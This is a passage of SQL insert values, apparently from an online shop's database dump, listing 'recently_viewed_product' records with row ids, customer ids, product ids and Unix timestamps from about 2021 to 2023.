(389, 'recently_viewed_product', 131, NULL, 2055, 1639180800),
(390, 'recently_viewed_product', 132, NULL, 2055, 1639267200),
(396, 'recently_viewed_product', 138, NULL, 2059, 1639785095),
(397, 'recently_viewed_product', 139, NULL, 2055, 1639785600),
(401, 'recently_viewed_product', 146, NULL, 2055, 1640217600),
(404, 'recently_viewed_product', 148, NULL, 2058, 1640908800),
(405, 'recently_viewed_product', 149, NULL, 2058, 1640908800),
(414, 'recently_viewed_product', 157, NULL, 2055, 1641254400),
(415, 'recently_viewed_product', 158, NULL, 2055, 1641340800),
(417, 'recently_viewed_product', 160, NULL, 2058, 1641340800),
(419, 'recently_viewed_product', 162, NULL, 2055, 1641340800),
(433, 'recently_viewed_product', 176, NULL, 2059, 1641754479),
(435, 'recently_viewed_product', 178, NULL, 2059, 1641757653),
(436, 'recently_viewed_product', 179, NULL, 2055, 1641772800),
(437, 'recently_viewed_product', 180, NULL, 2055, 1641859200),
(443, 'recently_viewed_product', 187, NULL, 2055, 1642032000),
(446, 'recently_viewed_product', 192, NULL, 2055, 1642204800),
(448, 'recently_viewed_product', 195, NULL, 2055, 1642377600),
(449, 'recently_viewed_product', 196, NULL, 2059, 1642468043),
(453, 'recently_viewed_product', 200, NULL, 2055, 1642550400),
(456, 'recently_viewed_product', 202, NULL, 2055, 1642636800),
(462, 'recently_viewed_product', 211, NULL, 2055, 1642982400),
(464, 'recently_viewed_product', 213, NULL, 2055, 1642982400),
(465, 'recently_viewed_product', 214, NULL, 2058, 1643085899),
(469, 'recently_viewed_product', 219, NULL, 2055, 1643587200),
(476, 'recently_viewed_product', 227, NULL, 2055, 1644019200),
(481, 'recently_viewed_product', 235, NULL, 2059, 1644397556),
(482, 'recently_viewed_product', 236, NULL, 2059, 1644403193),
(484, 'recently_viewed_product', 238, NULL, 2055, 1644364800),
(494, 'recently_viewed_product', 247, NULL, 2059, 1645072835),
(500, 'recently_viewed_product', 259, NULL, 2055, 1645747200),
(502, 'recently_viewed_product', 261, NULL, 2055, 1646006400),
(507, 'recently_viewed_product', 266, NULL, 2055, 1646352000),
(511, 'recently_viewed_product', 271, NULL, 2055, 1647043200),
(512, 'recently_viewed_product', 272, NULL, 2059, 1647067384),
(513, 'recently_viewed_product', 273, NULL, 2059, 1647068283),
(515, 'recently_viewed_product', 277, NULL, 2059, 1647763086),
(519, 'recently_viewed_product', 288, NULL, 2060, 1645920000),
(520, 'recently_viewed_product', 291, NULL, 2060, 1648857600),
(524, 'recently_viewed_product', 298, NULL, 2059, 1649816444),
(525, 'recently_viewed_product', 299, NULL, 2059, 1649817340),
(529, 'recently_viewed_product', 307, NULL, 2059, 1650373676),
(534, 'recently_viewed_product', 312, NULL, 2059, 1650512602),
(541, 'recently_viewed_product', 321, NULL, 2055, 1651190400),
(547, 'recently_viewed_product', 326, NULL, 2055, 1651363200),
(548, 'recently_viewed_product', 327, NULL, 2055, 1651449600),
(563, 'recently_viewed_product', 345, NULL, 2059, 1652432001),
(565, 'recently_viewed_product', 346, NULL, 2059, 1652433351),
(576, 'recently_viewed_product', 361, NULL, 2059, 1653111997),
(577, 'recently_viewed_product', 362, NULL, 2058, 1653091200),
(588, 'recently_viewed_product', 373, NULL, 2059, 1655033902),
(589, 'recently_viewed_product', 374, NULL, 2059, 1655036602),
(591, 'recently_viewed_product', 376, NULL, 2059, 1655683200),
(595, 'recently_viewed_product', 380, NULL, 2059, 1656201600),
(606, 'recently_viewed_product', 391, NULL, 2058, 1656806400),
(611, 'recently_viewed_product', 396, NULL, 2059, 1657637460),
(612, 'recently_viewed_product', 397, NULL, 2059, 1657634049),
(616, 'recently_viewed_product', 401, NULL, 2059, 1658317836),
(619, 'recently_viewed_product', 405, NULL, 2059, 1658620800),
(621, 'recently_viewed_product', 407, NULL, 2058, 1658620800),
(627, 'recently_viewed_product', 413, NULL, 2055, 1659052800),
(629, 'recently_viewed_product', 418, NULL, 2055, 1659484800),
(630, 'recently_viewed_product', 419, NULL, 2055, 1659657600),
(635, 'recently_viewed_product', 425, NULL, 2055, 1660176000),
(637, 'recently_viewed_product', 427, NULL, 2059, 1660238237),
(638, 'recently_viewed_product', 428, NULL, 2059, 1660238790),
(642, 'recently_viewed_product', 431, NULL, 2055, 1660262400),
(651, 'recently_viewed_product', 442, NULL, 2055, 1660953600),
(665, 'recently_viewed_product', 456, NULL, 2055, 1661558400),
(689, 'recently_viewed_product', 474, NULL, 2059, 1662768000),
(691, 'recently_viewed_product', 475, NULL, 2059, 1662830193),
(692, 'recently_viewed_product', 476, NULL, 2059, 1662832893),
(705, 'recently_viewed_product', 486, NULL, 2058, 1663545600),
(720, 'recently_viewed_product', 496, NULL, 2059, 1663804800),
(723, 'recently_viewed_product', 499, NULL, 2055, 1663977600),
(728, 'recently_viewed_product', 502, NULL, 2058, 1664098667),
(740, 'recently_viewed_product', 513, NULL, 2059, 1664755200),
(742, 'recently_viewed_product', 515, NULL, 2055, 1664755200),
(750, 'recently_viewed_product', 523, NULL, 2058, 1665014400),
(751, 'recently_viewed_product', 525, NULL, 2059, 1665187200),
(755, 'recently_viewed_product', 529, NULL, 2059, 1665187200),
(763, 'recently_viewed_product', 537, NULL, 2059, 1665273600),
(764, 'recently_viewed_product', 538, NULL, 2055, 1665360000),
(767, 'recently_viewed_product', 541, NULL, 2059, 1665360000),
(769, 'recently_viewed_product', 543, NULL, 2059, 1665360000),
(772, 'recently_viewed_product', 545, NULL, 2058, 1665532800),
(774, 'recently_viewed_product', 547, NULL, 2060, 1665619200),
(776, 'recently_viewed_product', 548, NULL, 2055, 1665619200),
(779, 'recently_viewed_product', 551, NULL, 2058, 1665705600),
(784, 'recently_viewed_product', 556, NULL, 2058, 1665878400),
(787, 'recently_viewed_product', 559, NULL, 2060, 1665878400),
(790, 'recently_viewed_product', 562, NULL, 2060, 1665792000),
(791, 'recently_viewed_product', 563, NULL, 2058, 1666051200),
(792, 'recently_viewed_product', 564, NULL, 2055, 1666051200),
(793, 'recently_viewed_product', 565, NULL, 2055, 1666137600),
(798, 'recently_viewed_product', 571, NULL, 2059, 1668124800),
(799, 'recently_viewed_product', 572, NULL, 2055, 1668124800),
(804, 'recently_viewed_product', 578, NULL, 2055, 1668556800),
(805, 'recently_viewed_product', 579, NULL, 2059, 1668643200),
(807, 'recently_viewed_product', 581, NULL, 2060, 1668729600),
(809, 'recently_viewed_product', 583, NULL, 2060, 1668816000),
(817, 'recently_viewed_product', 591, NULL, 2059, 1668988800),
(820, 'recently_viewed_product', 594, NULL, 2059, 1669075200),
(824, 'recently_viewed_product', 598, NULL, 2059, 1669075200),
(828, 'recently_viewed_product', 602, NULL, 2055, 1669161600),
(829, 'recently_viewed_product', 603, NULL, 2055, 1669161600),
(837, 'recently_viewed_product', 611, NULL, 2055, 1669680000),
(838, 'recently_viewed_product', 612, NULL, 2055, 1669766400),
(839, 'recently_viewed_product', 613, NULL, 2059, 1669766400),
(840, 'recently_viewed_product', 614, NULL, 2059, 1669680000),
(841, 'recently_viewed_product', 615, NULL, 2059, 1669766400),
(843, 'recently_viewed_product', 616, NULL, 2060, 1669852800),
(846, 'recently_viewed_product', 618, NULL, 2055, 1669939200),
(852, 'recently_viewed_product', 624, NULL, 2059, 1670198400),
(853, 'recently_viewed_product', 627, NULL, 2059, 1670371200),
(859, 'recently_viewed_product', 633, NULL, 2055, 1670889600),
(867, 'recently_viewed_product', 642, NULL, 2055, 1671235200),
(870, 'recently_viewed_product', 645, NULL, 2055, 1671321600),
(871, 'recently_viewed_product', 646, NULL, 2060, 1671408000),
(876, 'recently_viewed_product', 652, NULL, 2060, 1671926400),
(878, 'recently_viewed_product', 654, NULL, 2055, 1672012800),
(885, 'recently_viewed_product', 664, NULL, 2055, 1672617600),
(893, 'recently_viewed_product', 669, NULL, 2055, 1673049600),
(901, 'recently_viewed_product', 676, NULL, 2055, 1673395200),
(904, 'recently_viewed_product', 679, NULL, 2055, 1673481600),
(907, 'recently_viewed_product', 682, NULL, 2059, 1673568000),
(908, 'recently_viewed_product', 683, NULL, 2059, 1673654400),
(909, 'recently_viewed_product', 684, NULL, 2055, 1673913600),
(917, 'recently_viewed_product', 690, NULL, 2058, 1665878400),
(921, 'recently_viewed_product', 694, NULL, 2055, 1674432000),
(922, 'recently_viewed_product', 695, NULL, 2055, 1674518400),
(923, 'recently_viewed_product', 696, NULL, 2055, 1665878400),
(930, 'recently_viewed_product', 703, NULL, 2058, 1675123200),
(935, 'recently_viewed_product', 708, NULL, 2055, 1675382400),
(938, 'recently_viewed_product', 711, NULL, 2053, 1675641600),
(941, 'recently_viewed_product', 713, NULL, 2059, 1675814400),
(950, 'recently_viewed_product', 722, NULL, 2059, 1676764800),
(963, 'recently_viewed_product', 734, NULL, 2060, 1677456000),
(966, 'recently_viewed_product', 737, NULL, 2059, 1677542400),
(970, 'recently_viewed_product', 741, NULL, 2059, 1677628800),
(978, 'recently_viewed_product', 750, NULL, 2060, 1678147200),
(979, 'recently_viewed_product', 751, NULL, 2059, 1678233600),
(985, 'recently_viewed_product', 762, NULL, 2059, 1678752000),
(986, 'recently_viewed_product', 764, NULL, 2060, 1678838400),
(988, 'recently_viewed_product', 766, NULL, 2059, 1678924800),
(989, 'recently_viewed_product', 767, NULL, 2060, 1679011200),
(991, 'recently_viewed_product', 771, NULL, 2059, 1679184000),
(997, 'recently_viewed_product', 777, NULL, 2060, 1679616000),
(999, 'recently_viewed_product', 779, NULL, 2060, 1679788800),
(1000, 'recently_viewed_product', 780, NULL, 2059, 1679788800),
(1006, 'recently_viewed_product', 786, NULL, 2058, 1679961600),
(1009, 'recently_viewed_product', 787, NULL, 2053, 1671926400),
(1011, 'recently_viewed_product', 789, NULL, 2060, 1680048000),
(1012, 'recently_viewed_product', 790, NULL, 2055, 1680048000),
(1014, 'recently_viewed_product', 791, NULL, 2053, 1674432000),
(1015, 'recently_viewed_product', 792, NULL, 2059, 1680134400),
(1019, 'recently_viewed_product', 796, NULL, 2059, 1680307200),
(1020, 'recently_viewed_product', 797, NULL, 2060, 1680307200),
(1030, 'recently_viewed_product', 806, NULL, 2059, 1680739200),
(1031, 'recently_viewed_product', 807, NULL, 2060, 1680825600),
(1039, 'recently_viewed_product', 816, NULL, 2060, 1681171200),
(1043, 'recently_viewed_product', 820, NULL, 2059, 1681452457),
(1048, 'recently_viewed_product', 825, NULL, 2058, 1681603200),
(1049, 'recently_viewed_product', 826, NULL, 2058, 1681689600),
(1058, 'recently_viewed_product', 834, NULL, 2059, 1682380800),
(1061, 'recently_viewed_product', 837, NULL, 2060, 1682380800),
(1066, 'recently_viewed_product', 842, NULL, 2059, 1682812800),
(1067, 'recently_viewed_product', 843, NULL, 2059, 1682899200),
(1069, 'recently_viewed_product', 845, NULL, 2055, 1682812800),
(1072, 'recently_viewed_product', 848, NULL, 2060, 1683417600),
(1074, 'recently_viewed_product', 850, NULL, 2060, 1683763200),
(1095, 'recently_viewed_product', 868, NULL, 2060, 1684713600),
(1100, 'recently_viewed_product', 873, NULL, 2055, 1685404800),
(1112, 'recently_viewed_product', 882, NULL, 2060, 1686182400),
(1119, 'recently_viewed_product', 888, NULL, 2058, 1686441600),
(1121, 'recently_viewed_product', 890, NULL, 2058, 1686441600),
(1122, 'recently_viewed_product', 891, NULL, 2059, 1686528000),
(1123, 'recently_viewed_product', 892, NULL, 2055, 1686614400),
(1129, 'recently_viewed_product', 898, NULL, 2055, 1687046400),
(1130, 'recently_viewed_product', 899, NULL, 2059, 1687046400),
(1139, 'recently_viewed_product', 905, NULL, 2060, 1687305600),
(1142, 'recently_viewed_product', 908, NULL, 2055, 1687392000),
(1144, 'recently_viewed_product', 910, NULL, 2059, 1687633332),
(1151, 'recently_viewed_product', 917, NULL, 2060, 1687824000),
(1227, 'recently_viewed_product', NULL, NULL, 2062, 1687897468),
(1229, 'recently_viewed_product', 919, NULL, 2059, 1687910400),
(1230, 'recently_viewed_product', 920, NULL, 2059, 1687910400),
(1231, 'recently_viewed_product', 921, NULL, 2062, 1687910400),
(1233, 'recently_viewed_product', 923, NULL, 2060, 1687996800),
(1235, 'recently_viewed_product', 925, NULL, 2055, 1687996800),
(1238, 'recently_viewed_product', 928, NULL, 2055, 1688083200),
(1241, 'recently_viewed_product', 931, NULL, 2062, 1688169600),
(1242, 'recently_viewed_product', 932, NULL, 2062, 1688169600),
(1243, 'recently_viewed_product', 933, NULL, 2062, 1688256000),
(1246, 'recently_viewed_product', 937, NULL, 2059, 1688515200),
(1248, 'recently_viewed_product', 939, NULL, 2060, 1688601600),
(1249, 'recently_viewed_product', 940, NULL, 2062, 1688601600),
(1250, 'recently_viewed_product', 941, NULL, 2062, 1688688000),
(1252, 'recently_viewed_product', 943, NULL, 2060, 1688688000),
(1254, 'recently_viewed_product', 945, NULL, 2062, 1688947200),
(1257, 'recently_viewed_product', 948, NULL, 2059, 1689060963),
(1258, 'recently_viewed_product', 949, NULL, 2060, 1689033600),
(1260, 'recently_viewed_product', 952, NULL, 2059, 1689120000),
(1264, 'recently_viewed_product', 956, NULL, 2062, 1689292800),
(1270, 'recently_viewed_product', 962, NULL, 2062, 1689552000),
(1271, 'recently_viewed_product', 964, NULL, 2055, 1689638400),
(1273, 'recently_viewed_product', 966, NULL, 2055, 1689724800),
(1281, 'recently_viewed_product', 974, NULL, 2062, 1690329600),
(1283, 'recently_viewed_product', 976, NULL, 2062, 1690403284),
(1284, 'recently_viewed_product', 977, NULL, 2060, 1690329600),
(1286, 'recently_viewed_product', 979, NULL, 2055, 1690416000),
(1294, 'recently_viewed_product', 988, NULL, 2055, 1689206400),
(1297, 'recently_viewed_product', 992, NULL, 2060, 1691052467),
(1298, 'recently_viewed_product', 993, NULL, 2060, 1691052917),
(1300, 'recently_viewed_product', 996, NULL, 2058, 1691107200),
(1301, 'recently_viewed_product', 998, NULL, 2062, 1688688000),
(1303, 'recently_viewed_product', 1002, NULL, 2062, 1691193600),
(1308, 'recently_viewed_product', 1008, NULL, 2059, 1691280000),
(1309, 'recently_viewed_product', 1009, NULL, 2059, 1691357415),
(1310, 'recently_viewed_product', 1010, NULL, 2059, 1691366400),
(1311, 'recently_viewed_product', 1011, NULL, 2059, 1690502400),
(1312, 'recently_viewed_product', 1012, NULL, 2059, 1691452800),
(1318, 'recently_viewed_product', 1018, NULL, 2055, 1691625600),
(1319, 'recently_viewed_product', 1020, NULL, 2058, 1691625600),
(1320, 'recently_viewed_product', 1021, NULL, 2062, 1691625600),
(1322, 'recently_viewed_product', 1023, NULL, 2059, 1691712000),
(1324, 'recently_viewed_product', 1025, NULL, 2058, 1691737857),
(1325, 'recently_viewed_product', 1026, NULL, 2062, 1691737865),
(1329, 'recently_viewed_product', 1031, NULL, 2058, 1691798400),
(1332, 'recently_viewed_product', 1034, NULL, 2059, 1691884800),
(1336, 'recently_viewed_product', 1042, NULL, 2055, 1692057600),
(1338, 'recently_viewed_product', 1044, NULL, 2055, 1692174576),
(1340, 'recently_viewed_product', 1046, NULL, 2060, 1692174655),
(1342, 'recently_viewed_product', 1048, NULL, 2058, 1692174701),
(1343, 'recently_viewed_product', 1049, NULL, 2062, 1692174717),
(1350, 'recently_viewed_product', 1058, NULL, 2060, 1692258921),
(1352, 'recently_viewed_product', 1060, NULL, 2058, 1692258940),
(1354, 'recently_viewed_product', 1062, NULL, 2062, 1692258951),
(1355, 'recently_viewed_product', 1067, NULL, 2059, 1692316800),
(1356, 'recently_viewed_product', 1068, NULL, 2060, 1692343473),
(1358, 'recently_viewed_product', 1070, NULL, 2058, 1692343567),
(1359, 'recently_viewed_product', 1071, NULL, 2062, 1692343589),
(1360, 'recently_viewed_product', 1072, NULL, 2059, 1692403200),
(1363, 'recently_viewed_product', 1076, NULL, 2055, 1692576000),
(1364, 'recently_viewed_product', 1077, NULL, 2059, 1692662400),
(1368, 'recently_viewed_product', 1081, NULL, 2058, 1692748800),
(1369, 'recently_viewed_product', 1082, NULL, 2060, 1692803552),
(1371, 'recently_viewed_product', 1084, NULL, 2062, 1692835200),
(1374, 'recently_viewed_product', 1088, NULL, 2055, 1693008000),
(1375, 'recently_viewed_product', 1089, NULL, 2059, 1693008000),
(1376, 'recently_viewed_product', 1090, NULL, 2055, 1693008000),
(1377, 'recently_viewed_product', 1092, NULL, 2060, 1693094400),
(1380, 'recently_viewed_product', 1095, NULL, 2055, 1693304930),
(1382, 'recently_viewed_product', 1097, NULL, 2060, 1693305170),
(1384, 'recently_viewed_product', 1099, NULL, 2058, 1693305411),
(1387, 'recently_viewed_product', 1103, NULL, 2055, 1693526400),
(1389, 'recently_viewed_product', 1106, NULL, 2062, 1693612800),
(1391, 'recently_viewed_product', 1108, NULL, 2055, 1693612800),
(1393, 'recently_viewed_product', 1114, NULL, 2059, 1693872000),
(1394, 'recently_viewed_product', 1115, NULL, 2060, 1693955815),
(1396, 'recently_viewed_product', 1117, NULL, 2062, 1693955866),
(1397, 'recently_viewed_product', 1118, NULL, 2058, 1693955914),
(1399, 'recently_viewed_product', 1120, NULL, 2060, 1693958400),
(1405, 'recently_viewed_product', 1126, NULL, 2055, 1694304000),
(1407, 'recently_viewed_product', 1129, NULL, 2058, 1694426928),
(1408, 'recently_viewed_product', 1130, NULL, 2058, 1694426954),
(1409, 'recently_viewed_product', 1131, NULL, 2058, 1694427119),
(1410, 'recently_viewed_product', 1132, NULL, 2058, 1694427543),
(1413, 'recently_viewed_product', 1133, NULL, 2058, 1694443181),
(1414, 'recently_viewed_product', 1134, NULL, 2058, 1694455188),
(1423, 'recently_viewed_product', 1136, NULL, 2058, 1694533728),
(1429, 'recently_viewed_product', 1143, NULL, 2062, 1694822400),
(1430, 'recently_viewed_product', 1144, NULL, 2060, 1694822400),
(1431, 'recently_viewed_product', 1145, NULL, 2059, 1694822400),
(1433, 'recently_viewed_product', 1147, NULL, 2055, 1694908800),
(1435, 'recently_viewed_product', 1149, NULL, 2059, 1694908800),
(1437, 'recently_viewed_product', 1152, NULL, 2059, 1695081600),
(1438, 'recently_viewed_product', 1153, NULL, 2059, 1695081600),
(1439, 'recently_viewed_product', 1154, NULL, 2058, 1695173744),
(1441, 'recently_viewed_product', 1156, NULL, 2062, 1695173825),
(1453, 'recently_viewed_product', 1164, NULL, 2060, 1695351682),
(1454, 'recently_viewed_product', 1165, NULL, 2058, 1695351733),
(1456, 'recently_viewed_product', 1167, NULL, 2062, 1695351803),
(1457, 'recently_viewed_product', 1168, NULL, 2059, 1695340800),
(1458, 'recently_viewed_product', 1169, NULL, 2059, 1695340800),
(1460, 'recently_viewed_product', 1170, NULL, 2059, 1695340800),
(1461, 'recently_viewed_product', 1171, NULL, 2055, 1695427200),
(1462, 'recently_viewed_product', 1172, NULL, 2059, 1695513600),
(1463, 'recently_viewed_product', 1173, NULL, 2059, 1695513600),
(1464, 'recently_viewed_product', 1174, NULL, 2055, 1695600000),
(1469, 'recently_viewed_product', 1181, NULL, 2062, 1695859200),
(1470, 'recently_viewed_product', 1182, NULL, 2059, 1695945600),
(1472, 'recently_viewed_product', 1184, NULL, 2059, 1696032000),
(1473, 'recently_viewed_product', 1185, NULL, 2055, 1696032000),
(1474, 'recently_viewed_product', 1186, NULL, 2055, 1696118400),
(1476, 'recently_viewed_product', 1189, NULL, 2059, 1696377600),
(1477, 'recently_viewed_product', 1192, NULL, 2059, 1696464000),
(1478, 'recently_viewed_product', 1193, NULL, 2059, 1696550400),
(1479, 'recently_viewed_product', 1194, NULL, 2059, 1696550400),
(1480, 'recently_viewed_product', 1195, NULL, 2059, 1696550400),
(1486, 'recently_viewed_product', 1200, NULL, 2059, 1696636800),
(1487, 'recently_viewed_product', 1201, NULL, 2059, 1696636800),
(1488, 'recently_viewed_product', 1203, NULL, 2059, 1696723200),
(1489, 'recently_viewed_product', 1204, NULL, 2059, 1696723200),
(1491, 'recently_viewed_product', 1206, NULL, 2059, 1696809600),
(1492, 'recently_viewed_product', 1208, NULL, 2059, 1696896000),
(1493, 'recently_viewed_product', 1209, NULL, 2062, 1696896000),
(1494, 'recently_viewed_product', 1210, NULL, 2062, 1696896000),
(1495, 'recently_viewed_product', 1211, NULL, 2062, 1696896000),
(1496, 'recently_viewed_product', 1212, NULL, 2059, 1696896000),
(1497, 'recently_viewed_product', 1213, NULL, 2059, 1696896000),
(1501, 'recently_viewed_product', 1218, NULL, 2059, 1696982400),
(1502, 'recently_viewed_product', 1219, NULL, 2059, 1696982400),
(1503, 'recently_viewed_product', 1220, NULL, 2059, 1696982400),
(1505, 'recently_viewed_product', 1222, NULL, 2059, 1697068800),
(1506, 'recently_viewed_product', 1223, NULL, 2062, 1697110357),
(1507, 'recently_viewed_product', 1224, NULL, 2059, 1697068800),
(1508, 'recently_viewed_product', 1225, NULL, 2059, 1697155200),
(1509, 'recently_viewed_product', 1226, NULL, 2059, 1697155200),
(1513, 'recently_viewed_product', 1230, NULL, 2059, 1697155200),
(1517, 'recently_viewed_product', 1234, NULL, 2059, 1697241600),
(1520, 'recently_viewed_product', 1238, NULL, 2055, 1697414400),
(1523, 'recently_viewed_product', 1241, NULL, 2059, 1697414400),
(1525, 'recently_viewed_product', 1243, NULL, 2059, 1697500800),
(1526, 'recently_viewed_product', 1244, NULL, 2059, 1697587200),
(1529, 'recently_viewed_product', 1248, NULL, 2058, 1697760000),
(1538, 'recently_viewed_product', 1258, NULL, 2059, 1697932800),
(1542, 'recently_viewed_product', 1262, NULL, 2059, 1698019200),
(1546, 'recently_viewed_product', 1266, NULL, 2059, 1698105600),
(1549, 'recently_viewed_product', 1269, NULL, 2059, 1698566776),
(1553, 'recently_viewed_product', 1273, NULL, 2055, 1698710400),
(1554, 'recently_viewed_product', 1275, NULL, 2059, 1698796800),
(1555, 'recently_viewed_product', 1276, NULL, 2059, 1698796800),
(1558, 'recently_viewed_product', 1279, NULL, 2055, 1698796800),
(1560, 'recently_viewed_product', 1281, NULL, 2055, 1698883200),
(1565, 'recently_viewed_product', 1286, NULL, 2059, 1699056000),
(1566, 'recently_viewed_product', 1287, NULL, 2059, 1699153851),
(1570, 'recently_viewed_product', 1291, NULL, 2060, 1699337000),
(1572, 'recently_viewed_product', 1293, NULL, 2058, 1699337085),
(1575, 'recently_viewed_product', 1296, NULL, 2062, 1699337181),
(1579, 'recently_viewed_product', 1305, NULL, 2059, 1699401600),
(1582, 'recently_viewed_product', 1311, NULL, 2059, 1699574400),
(1585, 'recently_viewed_product', 1320, NULL, 2062, 1700006400),
(1590, 'recently_viewed_product', 1332, NULL, 2055, 1700179200),
(1591, 'recently_viewed_product', 1333, NULL, 2059, 1700265600),
(1592, 'recently_viewed_product', 1334, NULL, 2062, 1700333463),
(1593, 'recently_viewed_product', 1335, NULL, 2059, 1700352000),
(1601, 'recently_viewed_product', 1349, NULL, 2062, 1700799357),
(1602, 'recently_viewed_product', 1350, NULL, 2059, 1700870400),
(1603, 'recently_viewed_product', 1351, NULL, 2059, 1700870400),
(1606, 'recently_viewed_product', 1354, NULL, 2055, 1700956800),
(1607, 'recently_viewed_product', 1355, NULL, 2053, 1700956800),
(1608, 'recently_viewed_product', 1356, NULL, 2059, 1700956800),
(1610, 'recently_viewed_product', 1360, NULL, 2060, 1701043200),
(1612, 'recently_viewed_product', 1361, NULL, 2062, 1701043200),
(1613, 'recently_viewed_product', 1362, NULL, 2060, 1701103458),
(1614, 'recently_viewed_product', 1363, NULL, 2060, 1701125417),
(1620, 'recently_viewed_product', 1369, NULL, 2055, 1701216000),
(1621, 'recently_viewed_product', 1370, NULL, 2060, 1701239658),
(1622, 'recently_viewed_product', 1371, NULL, 2053, 1701216000),
(1623, 'recently_viewed_product', 1372, NULL, 2053, 1701302400),
(1624, 'recently_viewed_product', 1373, NULL, 2053, 1701302400),
(1627, 'recently_viewed_product', 1377, NULL, 2059, 1701388800),
(1629, 'recently_viewed_product', 1379, NULL, 2060, 1701420453),
(1630, 'recently_viewed_product', 1380, NULL, 2060, 1701388800),
(1631, 'recently_viewed_product', 1381, NULL, 2053, 1701388800),
(1633, 'recently_viewed_product', 1382, NULL, 2060, 1701492743),
(1634, 'recently_viewed_product', 1383, NULL, 2053, 1701475200),
(1635, 'recently_viewed_product', 1385, NULL, 2059, 1701475200),
(1637, 'recently_viewed_product', 1387, NULL, 2055, 1701475200),
(1638, 'recently_viewed_product', 1388, NULL, 2055, 1701561600),
(1640, 'recently_viewed_product', 1390, NULL, 2059, 1701561600),
(1644, 'recently_viewed_product', 1394, NULL, 2059, 1701648000),
(1646, 'recently_viewed_product', 1396, NULL, 2059, 1701734400),
(1647, 'recently_viewed_product', 1397, NULL, 2059, 1701734400),
(1648, 'recently_viewed_product', 1398, NULL, 2055, 1701734400),
(1649, 'recently_viewed_product', 1399, NULL, 2055, 1701734400),
(1652, 'recently_viewed_product', 1402, NULL, 2060, 1701819700),
(1653, 'recently_viewed_product', 1403, NULL, 2058, 1701819747),
(1657, 'recently_viewed_product', 1407, NULL, 2060, 1701820800),
(1658, 'recently_viewed_product', 1408, NULL, 2060, 1701820800),
(1659, 'recently_viewed_product', 1409, NULL, 2059, 1701907200),
(1661, 'recently_viewed_product', 1411, NULL, 2055, 1701907200),
(1662, 'recently_viewed_product', 1413, NULL, 2060, 1701950165),
(1664, 'recently_viewed_product', 1415, NULL, 2060, 1701975244),
(1665, 'recently_viewed_product', 1416, NULL, 2059, 1701993600),
(1671, 'recently_viewed_product', 1423, NULL, 2059, 1702080000),
(1672, 'recently_viewed_product', 1424, NULL, 2059, 1702166400),
(1673, 'recently_viewed_product', 1426, NULL, 2058, 1702166400),
(1676, 'recently_viewed_product', 1429, NULL, 2062, 1702252800),
(1677, 'recently_viewed_product', 1430, NULL, 2060, 1702296108),
(1678, 'recently_viewed_product', 1431, NULL, 2060, 1702297457),
(1679, 'recently_viewed_product', 1432, NULL, 2055, 1702252800),
(1681, 'recently_viewed_product', 1434, NULL, 2062, 1702353495),
(1684, 'recently_viewed_product', 1437, NULL, 2059, 1702339200),
(1686, 'recently_viewed_product', 1439, NULL, 2053, 1702339200),
(1688, 'recently_viewed_product', 1441, NULL, 2059, 1702425600),
(1690, 'recently_viewed_product', 1443, NULL, 2053, 1702425600),
(1694, 'recently_viewed_product', 1447, NULL, 2053, 1702425600),
(1696, 'recently_viewed_product', 1450, NULL, 2060, 1702425600),
(1699, 'recently_viewed_product', 1453, NULL, 2053, 1702512000),
(1702, 'recently_viewed_product', 1456, NULL, 2060, 1702512000),
(1707, 'recently_viewed_product', 1462, NULL, 2053, 1702512000),
(1713, 'recently_viewed_product', 1467, NULL, 2053, 1702598400),
(1714, 'recently_viewed_product', 1468, NULL, 2055, 1702598400),
(1718, 'recently_viewed_product', 1472, NULL, 2060, 1702598400),
(1719, 'recently_viewed_product', 1473, NULL, 2055, 1702598400),
(1720, 'recently_viewed_product', 1474, NULL, 2055, 1702598400),
(1723, 'recently_viewed_product', 1477, NULL, 2053, 1702598400),
(1728, 'recently_viewed_product', 1483, NULL, 2055, 1702684800),
(1729, 'recently_viewed_product', 1484, NULL, 2053, 1702684800),
(1738, 'recently_viewed_product', 1492, NULL, 2053, 1702684800),
(1740, 'recently_viewed_product', 1494, NULL, 2055, 1702771200),
(1742, 'recently_viewed_product', 1496, NULL, 2058, 1702771200),
(1743, 'recently_viewed_product', 1497, NULL, 2055, 1702771200),
(1744, 'recently_viewed_product', 1498, NULL, 2055, 1702771200),
(1745, 'recently_viewed_product', 1499, NULL, 2053, 1702771200),
(1748, 'recently_viewed_product', 1502, NULL, 2058, 1702771200),
(1749, 'recently_viewed_product', 1503, NULL, 2053, 1702771200),
(1750, 'recently_viewed_product', 1504, NULL, 2059, 1702771200),
(1751, 'recently_viewed_product', 1505, NULL, 2060, 1702837083),
(1756, 'recently_viewed_product', NULL, NULL, 2061, 1702911335),
(1759, 'recently_viewed_product', 1511, NULL, 2059, 1702944000),
(1760, 'recently_viewed_product', 1512, NULL, 2059, 1702944000),
(1761, 'recently_viewed_product', 1513, NULL, 2053, 1702944000),
(1765, 'recently_viewed_product', 1517, NULL, 2060, 1702944000),
(1771, 'recently_viewed_product', 1521, NULL, 2060, 1702944000),
(1772, 'recently_viewed_product', 1522, NULL, 2053, 1702944000),
(1773, 'recently_viewed_product', 1523, NULL, 2058, 1702944000),
(1775, 'recently_viewed_product', 1525, NULL, 2059, 1702944000),
(1777, 'recently_viewed_product', 1527, NULL, 2061, 1702944000),
(1780, 'recently_viewed_product', 1530, NULL, 2059, 1703044313),
(1782, 'recently_viewed_product', 1532, NULL, 2053, 1703030400),
(1787, 'recently_viewed_product', 1538, NULL, 2062, 1702771200),
(1789, 'recently_viewed_product', 1540, NULL, 2053, 1703116800),
(1790, 'recently_viewed_product', 1541, NULL, 2059, 1703116800),
(1793, 'recently_viewed_product', 1544, NULL, 2053, 1703116800),
(1794, 'recently_viewed_product', 1545, NULL, 2059, 1703116800),
(1797, 'recently_viewed_product', 1548, NULL, 2059, 1703218297),
(1798, 'recently_viewed_product', 1549, NULL, 2053, 1703203200),
(1799, 'recently_viewed_product', 1550, NULL, 2055, 1703203200),
(1802, 'recently_viewed_product', 1553, NULL, 2053, 1703203200),
(1803, 'recently_viewed_product', 1554, NULL, 2055, 1703203200),
(1804, 'recently_viewed_product', 1555, NULL, 2061, 1703265452),
(1805, 'recently_viewed_product', 1556, NULL, 2061, 1703265452),
(1806, 'recently_viewed_product', 1557, NULL, 2060, 1703203200),
(1807, 'recently_viewed_product', 1558, NULL, 2055, 1703203200),
(1808, 'recently_viewed_product', 1559, NULL, 2055, 1703289600),
(1811, 'recently_viewed_product', 1562, NULL, 2053, 1703289600),
(1812, 'recently_viewed_product', 1563, NULL, 2060, 1703203200),
(1814, 'recently_viewed_product', 1565, NULL, 2053, 1703289600),
